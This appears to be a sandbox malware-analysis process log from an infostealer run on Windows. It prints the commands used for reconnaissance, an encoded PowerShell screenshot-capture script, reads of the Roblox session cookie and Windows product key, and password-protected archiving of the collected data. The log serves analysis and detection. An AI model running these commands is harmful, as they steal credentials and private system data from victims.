- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1756
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4508
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4852
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3376
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d1fiwgjv\d1fiwgjv.cmdline"
        5⤵
        
        PID:3468
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB71B.tmp" "c:\Users\Admin\AppData\Local\Temp\d1fiwgjv\CSCDB8A64E5B542440EA87123D92F303FA2.TMP"
        6⤵
        
        PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2028
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:808
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4488
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3064
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2060
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2768
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1032
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4644
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1736
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5112
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe a -r -hp"Fortnite" "C:\Users\Admin\AppData\Local\Temp\uwOMx.zip" *"
    3⤵
    PID:1748
  - - C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe a -r -hp"Fortnite" "C:\Users\Admin\AppData\Local\Temp\uwOMx.zip" *
      4⤵
      Executes dropped EXE
      PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3848
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:6004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:6108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1100

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3244
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2100
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1916 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab5b2d06-977d-4582-9eaa-539b1ce74c51} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" gpu
    3⤵
    PID:5088
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2364 -prefMapHandle 2360 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {846eebe9-49f1-451a-a5b2-d1474881ff27} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" socket
    3⤵
    - Checks processor information in registry
    PID:192
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2928 -childID 1 -isForBrowser -prefsHandle 2612 -prefMapHandle 3188 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1188 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43855a0b-1c15-407d-a088-82421ea24255} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" tab
    3⤵
    PID:1680
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2944 -childID 2 -isForBrowser -prefsHandle 3656 -prefMapHandle 3648 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1188 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c02662ef-0051-4468-91a4-eb52818b757c} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" tab
    3⤵
    PID:768
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4608 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4604 -prefMapHandle 4600 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b20599a5-d688-470b-9b45-11b3806cc8f5} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" utility
    3⤵
    - Checks processor information in registry
    PID:5172
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5364 -childID 3 -isForBrowser -prefsHandle 5360 -prefMapHandle 5356 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1188 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e780f83-c94a-42b4-8156-fbabc7fcde30} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" tab
    3⤵
    PID:4936
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5496 -childID 4 -isForBrowser -prefsHandle 5504 -prefMapHandle 5508 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1188 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffbf112f-01f1-49ef-be09-77fdfdcc94e3} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" tab
    3⤵
    PID:4144
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5784 -childID 5 -isForBrowser -prefsHandle 5704 -prefMapHandle 5712 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1188 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc45226e-475a-4882-97b3-29ff519b3013} 2100 "\\.\pipe\gecko-crash-server-pipe.2100" tab
    3⤵
    PID:3028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:4608

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5284
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:5636
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1928 -prefsLen 27568 -prefMapSize 244705 -appDir "C:\Program Files\Mozilla Firefox\browser" - {38fe9e01-13d8-43e0-b471-7aafacc20e49} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" gpu
    3⤵
    PID:4840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2416 -prefMapHandle 2412 -prefsLen 27604 -prefMapSize 244705 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4afddf56-43dc-4365-892b-bbef7c730343} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" socket
    3⤵
    PID:2736
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2760 -childID 1 -isForBrowser -prefsHandle 2784 -prefMapHandle 2820 -prefsLen 27745 -prefMapSize 244705 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b52d78cb-de17-47d8-843c-22bde5354186} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" tab
    3⤵
    PID:3396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -childID 2 -isForBrowser -prefsHandle 4040 -prefMapHandle 4036 -prefsLen 32978 -prefMapSize 244705 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e6e81e4-4c62-4bfa-9727-86b43f7e4112} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" tab
    3⤵
    PID:3060
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4812 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4888 -prefMapHandle 4884 -prefsLen 32978 -prefMapSize 244705 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4215989d-2bc9-4276-9f93-ac84dcf28f5d} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" utility
    3⤵
    - Checks processor information in registry
    PID:1276
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6260 -childID 3 -isForBrowser -prefsHandle 6304 -prefMapHandle 6300 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {785ae22f-2031-4ac7-8a57-ddf7d2280818} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" tab
    3⤵
    PID:908
- - C:\Program Files\Mozilla Firefox\firefox.exe
